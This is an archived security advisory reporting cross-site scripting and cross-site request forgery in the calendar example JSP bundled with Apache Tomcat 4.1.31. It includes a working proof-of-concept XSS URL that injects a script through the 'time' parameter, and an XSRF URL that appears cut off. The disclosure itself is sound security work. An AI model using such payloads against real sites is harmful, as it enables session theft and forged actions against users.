TUCoPS :: Web :: Apache :: tb12401.htm

Apache tomcat calendar example cross site scripting and cross site request forgery vulnerability
Apache tomcat calendar example cross site scripting and cross site request forgery vulnerability
Apache tomcat calendar example cross site scripting and cross site request forgery vulnerability



Apache Tomcat/4.1.31 ships with built in examples. One of the example calendar.jsp suffers from input validation error and could be exploited for cross site scriptingand cross site request forgery.

XSS
http://myserver:myport/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert("XSS!")%3c%2fscript%3e 

XSRF
http://myserver:myport/examples/jsp/cal/cal2.jsp?time=> 

-

Tushar Vartak

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH